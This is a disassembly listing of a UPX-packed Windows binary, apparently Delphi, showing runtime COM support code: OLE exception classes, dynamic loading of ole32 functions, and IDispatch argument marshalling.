off_40965C dd offset dword_4096A8 ; DATA XREF: sub_409EA4+21�r
; sub_409FB8+8�r
dd 7 dup(0)
dd offset dword_4096A8
dd 0Ch, 405AA8h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_4096A8 dd 6C4F4509h, 72724565h, 0C08B726Fh ; UPX0:0040967C�o
off_4096B4 dd offset dword_409700 ; DATA XREF: sub_409970+A�r
; sub_40A050+85�r
dd 7 dup(0)
dd offset dword_409700
dd 10h, 40965Ch, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_409700 dd 6C4F450Ch, 73795365h, 6F727245h, 408D72h ; UPX0:004096D4�o
off_409710 dd offset dword_40975C ; DATA XREF: sub_409AA8+B1�r
; sub_40A050+5D�r
dd 2 dup(0)
dd offset dword_40975C
dd 4 dup(0)
dd offset word_409776
dd 18h, 4096B4h, 4029A0h, 4029ACh, 4029B0h, 4029B4h, 4029A8h
dd 4028A8h, 4028BCh, 4028E4h
dword_40975C dd 0Eh, 20000h, 10000000h, 100040h, 10000000h, 140040h
; DATA XREF: UPX0:off_409710�o
; UPX0:0040971C�o
db 2 dup(0)
word_409776 dw 450Dh ; DATA XREF: UPX0:00409730�o
dword_409778 dd 45656C4Fh, 70656378h, 6E6F6974h, 0FFFFFFFFh, 9, 72617041h
dd 6E656D74h, 74h, 0FFFFFFFFh, 4, 65657246h, 0
dword_4097A8 dd 0FFFFFFFFh, 4, 68746F42h, 0
; =============== S U B R O U T I N E =======================================
sub_4097B8 proc near ; CODE XREF: sub_4098D8+35�p
push ebx
push esi
mov ebx, edx
mov esi, eax
mov eax, ebx
mov edx, esi
call sub_40321C
mov eax, [ebx]
call sub_406654
mov esi, eax
jmp short loc_4097ED
; ---------------------------------------------------------------------------
loc_4097D2: ; CODE XREF: sub_4097B8+44�j
; sub_4097B8+48�j
mov eax, [ebx]
call sub_403534
mov edx, esi
sub edx, eax
mov eax, ebx
call sub_403624
mov eax, [ebx]
call sub_406654
mov esi, eax
loc_4097ED: ; CODE XREF: sub_4097B8+18�j
mov eax, [ebx]
call sub_403424
test eax, eax
jle short loc_409802
mov al, [esi]
sub al, 21h
jb short loc_4097D2
sub al, 0Dh
jz short loc_4097D2
loc_409802: ; CODE XREF: sub_4097B8+3E�j
pop esi
pop ebx
retn
sub_4097B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409808 proc near ; CODE XREF: sub_4098D8+41�p
; sub_409970+F�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
test dl, dl
jz short loc_409825
add esp, 0FFFFFFF0h
call sub_4029DC
loc_409825: ; CODE XREF: sub_409808+13�j
mov edi, ecx
mov [ebp+var_1], dl
mov ebx, eax
mov esi, [ebp+arg_4]
xor eax, eax
push ebp
push offset loc_4098AF
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_8]
mov edx, edi
call sub_403260
cmp [ebp+var_8], 0
jnz short loc_409881
lea edx, [ebp+var_8]
mov eax, esi
call sub_407154
cmp [ebp+var_8], 0
jnz short loc_409881
push 0
lea edx, [ebp+var_C]
mov eax, off_40B338
call sub_40478C
mov edx, [ebp+var_C]
mov [ebp+var_14], esi
mov [ebp+var_10], 0
lea ecx, [ebp+var_14]
lea eax, [ebp+var_8]
call sub_406DDC
loc_409881: ; CODE XREF: sub_409808+43�j
; sub_409808+53�j
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_8]
xor edx, edx
mov eax, ebx
call sub_407A90
mov [ebx+0Ch], esi
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4098B6
loc_4098A1: ; CODE XREF: sub_409808+AC�j
lea eax, [ebp+var_C]
mov edx, 2
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_4098AF: ; DATA XREF: sub_409808+2A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4098A1
; ---------------------------------------------------------------------------
loc_4098B6: ; CODE XREF: sub_409808+A6�j
; DATA XREF: sub_409808+94�o
mov eax, ebx
cmp [ebp+var_1], 0
jz short loc_4098CD
call sub_402A34
pop large dword ptr fs:0
add esp, 0Ch
loc_4098CD: ; CODE XREF: sub_409808+B4�j
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_409808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098D8 proc near ; CODE XREF: sub_409AA8+B6�p
; sub_40A050+62�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
push esi
push edi
test dl, dl
jz short loc_4098EC
add esp, 0FFFFFFF0h
call sub_4029DC
loc_4098EC: ; CODE XREF: sub_4098D8+A�j
mov esi, ecx
mov ebx, edx
mov edi, eax
xor eax, eax
push ebp
push offset loc_40994A
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_0]
push eax
lea edx, [ebp+var_4]
mov eax, esi
call sub_4097B8
mov ecx, [ebp+var_4]
xor edx, edx
mov eax, edi
call sub_409808
lea eax, [edi+10h]
mov edx, [ebp+arg_8]
call sub_40321C
lea eax, [edi+14h]
mov edx, [ebp+arg_4]
call sub_40321C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_409951
loc_409941: ; CODE XREF: sub_4098D8+77�j
lea eax, [ebp+var_4]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_40994A: ; DATA XREF: sub_4098D8+1D�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_409941
; ---------------------------------------------------------------------------
loc_409951: ; CODE XREF: sub_4098D8+71�j
; DATA XREF: sub_4098D8+64�o
mov eax, edi
test bl, bl
jz short loc_409966
call sub_402A34
pop large dword ptr fs:0
add esp, 0Ch
loc_409966: ; CODE XREF: sub_4098D8+7D�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 10h
sub_4098D8 endp
; =============== S U B R O U T I N E =======================================
sub_409970 proc near ; CODE XREF: sub_40998C+10�p
push ebx
mov ebx, eax
push ebx
push 0
xor ecx, ecx
mov dl, 1
mov eax, off_4096B4
call sub_409808
call sub_402C98
pop ebx
retn
sub_409970 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40998C proc near ; CODE XREF: sub_409ED8:loc_409FA4�p
push ebx
mov ebx, eax
mov eax, ebx
call sub_4095C8
test al, al
jnz short loc_4099A1
mov eax, ebx
call sub_409970
loc_4099A1: ; CODE XREF: sub_40998C+C�j
pop ebx
retn
sub_40998C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4099A4 proc near ; CODE XREF: UPX0:0040A405�p
push ebx
push offset dword_409A18
call sub_405708 ; GetModuleHandleA
mov ebx, eax
test ebx, ebx
jz short loc_409A15
push offset aCocreateinstan ; "CoCreateInstanceEx"
push ebx
call sub_405710 ; GetProcAddress
mov dword_40B2CC, eax
push offset aCoinitializeex ; "CoInitializeEx"
push ebx
call sub_405710 ; GetProcAddress
mov dword_40B2D0, eax
push offset aCoaddrefserver ; "CoAddRefServerProcess"
push ebx
call sub_405710 ; GetProcAddress
mov dword_40B2D4, eax
push offset aCoreleaseserve ; "CoReleaseServerProcess"
push ebx
call sub_405710 ; GetProcAddress
mov dword_40B2D8, eax
push offset aCoresumeclasso ; "CoResumeClassObjects"
push ebx
call sub_405710 ; GetProcAddress
mov dword_40B2DC, eax
push offset aCosuspendclass ; "CoSuspendClassObjects"
push ebx
call sub_405710 ; GetProcAddress
mov dword_40B2E0, eax
loc_409A15: ; CODE XREF: sub_4099A4+F�j
pop ebx
retn
sub_4099A4 endp
; ---------------------------------------------------------------------------
align 4
dword_409A18 dd 33656C6Fh, 6C642E32h, 6ChaCocreateinstan db 'CoCreateInstanceEx',0 ; DATA XREF: sub_4099A4+11�o
align 4
aCoinitializeex db 'CoInitializeEx',0 ; DATA XREF: sub_4099A4+21�o
align 4
aCoaddrefserver db 'CoAddRefServerProcess',0 ; DATA XREF: sub_4099A4+31�o
align 10h
aCoreleaseserve db 'CoReleaseServerProcess',0 ; DATA XREF: sub_4099A4+41�o
align 4
aCoresumeclasso db 'CoResumeClassObjects',0 ; DATA XREF: sub_4099A4+51�o
align 10h
aCosuspendclass db 'CoSuspendClassObjects',0 ; DATA XREF: sub_4099A4+61�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AA8 proc near ; DATA XREF: UPX0:0040A425�o
; UPX0:off_40C014�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_409B98
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
mov [ebp+var_14], eax
lea eax, [ebp+var_4]
call sub_4047E4
push eax
push 0
call sub_4095C0
test eax, eax
jnz short loc_409B25
lea eax, [ebp+var_8]
call sub_403724
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+10h]
lea eax, [ebp+var_C]
call sub_403724
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+14h]
lea eax, [ebp+var_10]
call sub_403724
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+18h]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+1Ch]
loc_409B25: ; CODE XREF: sub_409AA8+38�j
push esi
push ebx
lea eax, [ebp+var_18]
mov edx, [ebp+var_8]
call sub_403410
mov eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1C]
mov edx, [ebp+var_10]
call sub_403410
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_14]
push eax
lea eax, [ebp+var_20]
mov edx, [ebp+var_C]
call sub_403410
mov ecx, [ebp+var_20]
mov dl, 1
mov eax, off_409710
call sub_4098D8
jmp sub_402C98
sub_409AA8 endp
; ---------------------------------------------------------------------------
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_409B9F
loc_409B75: ; CODE XREF: UPX0:00409B9D�j
lea eax, [ebp-20h]
mov edx, 3
call sub_4031EC
lea eax, [ebp-10h]
mov edx, 3
call sub_40373C
lea eax, [ebp-4]
call sub_4047E4
retn
; ---------------------------------------------------------------------------
loc_409B98: ; DATA XREF: sub_409AA8+16�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_409B75
; ---------------------------------------------------------------------------
loc_409B9F: ; CODE XREF: UPX0:00409B97�j
; DATA XREF: UPX0:00409B70�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BA8 proc near ; CODE XREF: sub_409FD0+74�p
var_650 = dword ptr -650h
var_250 = dword ptr -250h
var_50 = byte ptr -50h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00402C60 SIZE 00000036 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFF9B0h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
lea eax, [ebp+var_50]
mov edx, off_409574
call sub_403784
xor eax, eax
push ebp
push offset loc_409E94
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
mov [ebp+var_14], eax
xor ecx, ecx
push ebp
push offset loc_409E71
push dword ptr fs:[ecx]
mov fs:[ecx], esp
xor eax, eax
mov al, [esi+1]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_409D8A
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+var_10]
add eax, eax
lea edi, [ebp+eax*8+var_650]
xor ebx, ebx
loc_409C11: ; CODE XREF: sub_409BA8+1DC�j
sub edi, 10h
mov al, [esi+ebx+3]
mov edx, eax
and dl, 7Fh
and edx, 0FFh
mov [ebp+var_C], edx
and al, 80h
cmp [ebp+var_C], 0Ah
jnz short loc_409C40
mov dword ptr [edi], 0Ah
mov dword ptr [edi+8], 80020004h
jmp loc_409D80
; ---------------------------------------------------------------------------
loc_409C40: ; CODE XREF: sub_409BA8+84�j
cmp [ebp+var_C], 48h
jnz short loc_409CAE
mov edx, [ebp+var_14]
lea edx, [ebp+edx*8+var_250]
mov [ebp+var_1C], edx
test al, al
jz short loc_409C81
mov eax, [ebp+var_18]
mov eax, [eax]
mov eax, [eax]
call sub_403C30
mov edx, [ebp+var_1C]
mov [edx], eax
mov eax, [ebp+var_18]
mov eax, [eax]
mov edx, [ebp+var_1C]
mov [edx+4], eax
mov dword ptr [edi], 4008h
mov eax, [ebp+var_1C]
mov [edi+8], eax
jmp short loc_409CA6
; ---------------------------------------------------------------------------
loc_409C81: ; CODE XREF: sub_409BA8+AD�j
mov eax, [ebp+var_18]
mov eax, [eax]
call sub_403C30
mov edx, [ebp+var_1C]
mov [edx], eax
mov eax, [ebp+var_1C]
xor edx, edx
mov [eax+4], edx
mov dword ptr [edi], 8
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [edi+8], eax
loc_409CA6: ; CODE XREF: sub_409BA8+D7�j
inc [ebp+var_14]
jmp loc_409D7C
; ---------------------------------------------------------------------------
loc_409CAE: ; CODE XREF: sub_409BA8+9C�j
test al, al
jz short loc_409CF1
cmp [ebp+var_C], 0Ch
jnz short loc_409CDA
mov eax, [ebp+var_18]
mov eax, [eax]
cmp word ptr [eax], 100h
jnz short loc_409CDA
mov eax, [ebp+var_18]
mov eax, [eax]
mov edx, eax
mov eax, [ebp+var_18]
mov eax, [eax]
mov ecx, 8
call sub_403F24
loc_409CDA: ; CODE XREF: sub_409BA8+10E�j
; sub_409BA8+11A�j
mov eax, [ebp+var_C]
or eax, 4000h
mov [edi], eax
mov eax, [ebp+var_18]
mov eax, [eax]
mov [edi+8], eax
jmp loc_409D7C
; ---------------------------------------------------------------------------
loc_409CF1: ; CODE XREF: sub_409BA8+108�j
cmp [ebp+var_C], 0Ch
jnz short loc_409D57
mov eax, [ebp+var_18]
cmp word ptr [eax], 100h
jnz short loc_409D3B
mov eax, [ebp+var_14]
lea eax, [ebp+eax*8+var_250]
mov [ebp+var_20], eax
mov eax, [ebp+var_18]
mov eax, [eax]
mov eax, [eax+8]
call sub_403C30
mov edx, [ebp+var_20]
mov [edx], eax
mov eax, [ebp+var_20]
xor edx, edx
mov [eax+4], edx
mov dword ptr [edi], 8
mov eax, [ebp+var_20]
mov eax, [eax]
mov [edi+8], eax
inc [ebp+var_14]
jmp short loc_409D7C
; ---------------------------------------------------------------------------
loc_409D3B: ; CODE XREF: sub_409BA8+157�j
mov edx, [eax]
mov [edi], edx
mov edx, [eax+4]
mov [edi+4], edx
mov edx, [eax+8]
mov [edi+8], edx
mov eax, [eax+0Ch]
mov [edi+0Ch], eax
add [ebp+var_18], 0Ch
jmp short loc_409D7C
; ---------------------------------------------------------------------------
loc_409D57: ; CODE XREF: sub_409BA8+14D�j
mov eax, [ebp+var_C]
mov [edi], eax
mov eax, [ebp+var_18]
mov eax, [eax]
mov [edi+8], eax
cmp [ebp+var_C], 5
jl short loc_409D7C
cmp [ebp+var_C], 7
jg short loc_409D7C
add [ebp+var_18], 4
mov eax, [ebp+var_18]
mov eax, [eax]
mov [edi+0Ch], eax
loc_409D7C: ; CODE XREF: sub_409BA8+101�j
; sub_409BA8+144�j ...
add [ebp+var_18], 4
loc_409D80: ; CODE XREF: sub_409BA8+93�j
inc ebx
cmp ebx, [ebp+var_10]
jnz loc_409C11
loc_409D8A: ; CODE XREF: sub_409BA8+4F�j
lea eax, [ebp+var_650]
mov [ebp+var_30], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_2C], eax
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
xor eax, eax
mov al, [esi+2]
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov edx, [eax]
xor eax, eax
mov al, [esi]
cmp eax, 4
jnz short loc_409DE0
mov ecx, [ebp+var_650]
and ecx, 0FFFh
cmp ecx, 9
jnz short loc_409DCE
mov eax, 8
loc_409DCE: ; CODE XREF: sub_409BA8+21F�j
mov ecx, [ebp+var_8]
mov dword ptr [ecx], 0FFFFFFFDh
sub [ebp+var_2C], 4
inc [ebp+var_24]
jmp short loc_409DF6
; ---------------------------------------------------------------------------
loc_409DE0: ; CODE XREF: sub_409BA8+20E�j
cmp eax, 1
jnz short loc_409DF6
cmp [ebp+var_10], 0
jnz short loc_409DF6
cmp [ebp+arg_0], 0
jz short loc_409DF6
mov eax, 3
loc_409DF6: ; CODE XREF: sub_409BA8+236�j
; sub_409BA8+23B�j ...
push 0
lea ecx, [ebp+var_50]
push ecx
mov ecx, [ebp+arg_0]
push ecx
lea ecx, [ebp+var_30]
push ecx
push eax
push 0
mov eax, off_40B32C
push eax
push edx
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+18h]
test eax, eax
jz short loc_409E23
lea edx, [ebp+var_50]
call sub_40A124
loc_409E23: ; CODE XREF: sub_409BA8+271�j
mov ebx, [ebp+var_14]
test ebx, ebx
jz short loc_409E4A
loc_409E2A: ; CODE XREF: sub_409BA8+2A0�j
dec ebx
lea eax, [ebp+ebx*8+var_250]
mov edx, [eax+4]
test edx, edx
jz short loc_409E46
mov ecx, [eax]
mov eax, edx
mov edx, eax
mov eax, ecx
call sub_403C0C
loc_409E46: ; CODE XREF: sub_409BA8+28F�j
test ebx, ebx
jnz short loc_409E2A
loc_409E4A: ; CODE XREF: sub_409BA8+280�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_409E78
loc_409E57: ; CODE XREF: sub_409BA8+2CE�j
mov ebx, [ebp+var_14]
test ebx, ebx
jz short locret_409E70
loc_409E5E: ; CODE XREF: sub_409BA8+2C6�j
dec ebx
mov eax, [ebp+ebx*8+var_250]
push eax
call sub_4095B8
test ebx, ebx
jnz short loc_409E5E
locret_409E70: ; CODE XREF: sub_409BA8+2B4�j
retn
; ---------------------------------------------------------------------------
loc_409E71: ; DATA XREF: sub_409BA8+38�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_409E57
; ---------------------------------------------------------------------------
loc_409E78: ; DATA XREF: sub_409BA8+2AA�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_409E9B
loc_409E85: ; CODE XREF: sub_409BA8+2F1�j
lea eax, [ebp+var_50]
mov edx, off_409574
call sub_403850
retn
; ---------------------------------------------------------------------------
loc_409E94: ; DATA XREF: sub_409BA8+25�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_409E85
; ---------------------------------------------------------------------------
loc_409E9B: ; CODE XREF: sub_409BA8+2EB�j
; DATA XREF: sub_409BA8+2D8�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_409BA8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409EA4 proc near ; CODE XREF: sub_409ED8+C4�p
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov eax, [ebp+arg_0]
mov eax, [eax-4]
mov [ebp+var_8], eax
mov [ebp+var_4], 6
lea eax, [ebp+var_8]
push eax
push 0
mov ecx, off_40B424
mov dl, 1
mov eax, off_40965C
call sub_4079FC
call sub_402C98
pop ecx
pop ecx
pop ebp
retn
sub_409EA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409ED8 proc near ; CODE XREF: sub_409FD0+54�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_4], edx
mov [ebp+var_1C], eax
mov ebx, [ebp+var_4]
xor edi, edi
mov [ebp+var_8], esp
mov eax, [ebp+var_C]
inc eax
shl eax, 2
sub esp, eax
lea eax, [ebp+var_10]
mov [eax], esp
loc_409F00: ; CODE XREF: sub_409ED8+99�j
mov eax, ebx
call sub_406834
mov esi, eax
push 0
push 0
push esi
push ebx
push 0
push 0
call sub_405730 ; MultiByteToWideChar
inc eax
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
add eax, eax
add eax, 3
and eax, 0FFFFFFFCh
sub esp, eax
lea eax, [ebp+var_18]
mov [eax], esp
test edi, edi
jnz short loc_409F3C
mov eax, [ebp+var_10]
mov edx, [ebp+var_18]
mov [eax], edx
jmp short loc_409F4A
; ---------------------------------------------------------------------------
loc_409F3C: ; CODE XREF: sub_409ED8+58�j
mov eax, [ebp+var_C]
sub eax, edi
mov edx, [ebp+var_10]
mov ecx, [ebp+var_18]
mov [edx+eax*4], ecx
loc_409F4A: ; CODE XREF: sub_409ED8+62�j
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_18]
push eax
push esi
push ebx
push 0
push 0
call sub_405730 ; MultiByteToWideChar
mov eax, [ebp+var_18]
mov edx, [ebp+var_14]
mov word ptr [eax+edx*2-2], 0
inc esi
add ebx, esi
inc edi
cmp edi, [ebp+var_C]
jnz short loc_409F00
mov eax, [ebp+arg_0]
push eax
call sub_405718 ; GetThreadLocale
push eax
mov eax, [ebp+var_C]
push eax
mov eax, [ebp+var_10]
push eax
mov eax, off_40B32C
push eax
mov eax, [ebp+var_1C]
push eax
mov eax, [eax]
call dword ptr [eax+14h]
cmp eax, 80020006h
jnz short loc_409FA4
push ebp
call sub_409EA4
pop ecx
jmp short loc_409FA9
; ---------------------------------------------------------------------------
loc_409FA4: ; CODE XREF: sub_409ED8+C1�j
call sub_40998C
loc_409FA9: ; CODE XREF: sub_409ED8+CA�j
mov esp, [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_409ED8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_409FB8 proc near ; CODE XREF: sub_409FD0:loc_40A006�p
mov ecx, off_40B450
mov dl, 1
mov eax, off_40965C
call sub_4079C0
call sub_402C98
retn
sub_409FB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409FD0 proc near ; DATA XREF: UPX0:0040A40F�o
; UPX0:off_40B010�o
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
mov ebx, [ebp+arg_8]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov dx, [eax]
cmp dx, 9
jnz short loc_409FF5
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_40A00B
; ---------------------------------------------------------------------------
loc_409FF5: ; CODE XREF: sub_409FD0+1B�j
cmp dx, 4009h
jnz short loc_40A006
mov eax, [eax+8]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40A00B
; ---------------------------------------------------------------------------
loc_40A006: ; CODE XREF: sub_409FD0+2A�j
call sub_409FB8
loc_40A00B: ; CODE XREF: sub_409FD0+23�j
; sub_409FD0+34�j
lea eax, [ebp+var_104]
push eax
xor ecx, ecx
mov cl, [ebx+2]
inc ecx
xor eax, eax
mov al, [ebx+1]
lea edx, [ebx+eax+3]
mov eax, [ebp+var_4]
call sub_409ED8
test esi, esi
jz short loc_40A034
mov eax, esi
call sub_403CCC
loc_40A034: ; CODE XREF: sub_409FD0+5B�j
lea eax, [ebp+arg_C]
push eax
push esi
lea ecx, [ebp+var_104]
mov edx, ebx
mov eax, [ebp+var_4]
call sub_409BA8
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_409FD0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A050 proc near ; CODE XREF: sub_40A124+4�p
; sub_40A140+D8�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push 0
push 0
push 0
push 0
push ebx
push esi
mov [ebp+var_4], ecx
mov ebx, edx
xor edx, edx
push ebp
push offset loc_40A115
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp eax, 80020009h
jnz short loc_40A0CE
mov eax, [ebx+1Ch]
push eax
lea eax, [ebp+var_8]
mov edx, [ebx+4]
call sub_403410
mov eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
mov edx, [ebx+0Ch]
call sub_403410
mov eax, [ebp+var_C]
push eax
mov eax, [ebx+10h]
push eax
lea eax, [ebp+var_10]
mov edx, [ebx+8]
call sub_403410
mov ecx, [ebp+var_10]
mov dl, 1
mov eax, off_409710
call sub_4098D8
mov esi, eax
cmp [ebp+arg_0], 0
jz short loc_40A0E1
mov eax, ebx
mov edx, off_409574
call sub_403964
jmp short loc_40A0E1
; ---------------------------------------------------------------------------
loc_40A0CE: ; CODE XREF: sub_40A050+25�j
push eax
push 0
xor ecx, ecx
mov dl, 1
mov eax, off_4096B4
call sub_409808
mov esi, eax
loc_40A0E1: ; CODE XREF: sub_40A050+6D�j
; sub_40A050+7C�j
cmp [ebp+var_4], 0
jz short loc_40A0F3
push [ebp+var_4]
mov eax, esi
jmp sub_402C98
; ---------------------------------------------------------------------------
jmp short loc_40A0FA
; ---------------------------------------------------------------------------
loc_40A0F3: ; CODE XREF: sub_40A050+95�j
mov eax, esi
call sub_402C98
loc_40A0FA: ; CODE XREF: sub_40A050+A1�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40A11C
loc_40A107: ; CODE XREF: sub_40A050+CA�j
lea eax, [ebp+var_10]
mov edx, 3
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_40A115: ; DATA XREF: sub_40A050+15�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40A107
; ---------------------------------------------------------------------------
loc_40A11C: ; CODE XREF: sub_40A050+C4�j
; DATA XREF: sub_40A050+B2�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40A050 endp
; =============== S U B R O U T I N E =======================================
sub_40A124 proc near ; CODE XREF: sub_409BA8+276�p
push 0
xor ecx, ecx
call sub_40A050
retn
sub_40A124 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A130 proc near ; CODE XREF: sub_40A140+AA�p
xor ecx, ecx
mov edx, 20h
call sub_4026A0
retn
sub_40A130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A140 proc near ; CODE XREF: sub_40A228+1E�p
var_30 = byte ptr -30h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFD0h
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
xor edx, edx
mov edi, esp
movzx ecx, byte ptr [ebx+1]
mov [ebp+var_8], ecx
test ecx, ecx
jz short loc_40A1AA
add ebx, 3
mov esi, [ebp+arg_10]
loc_40A161: ; CODE XREF: sub_40A140+65�j
movzx eax, byte ptr [ebx]
test al, 80h
jnz short loc_40A193
cmp al, 0Ch
jz short loc_40A183
cmp al, 5
jb short loc_40A19B
cmp al, 7
ja short loc_40A19B
push dword ptr [esi+4]
push dword ptr [esi]
push edx
push eax
add esi, 8
jmp short loc_40A1A3
; ---------------------------------------------------------------------------
loc_40A183: ; CODE XREF: sub_40A140+2B�j
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
add esi, 10h
jmp short loc_40A1A3
; ---------------------------------------------------------------------------
loc_40A193: ; CODE XREF: sub_40A140+26�j
and al, 7Fh
or eax, 4000h
loc_40A19B: ; CODE XREF: sub_40A140+30�j
; sub_40A140+35�j
push edx
push dword ptr [esi]
push edx
push eax
add esi, 4
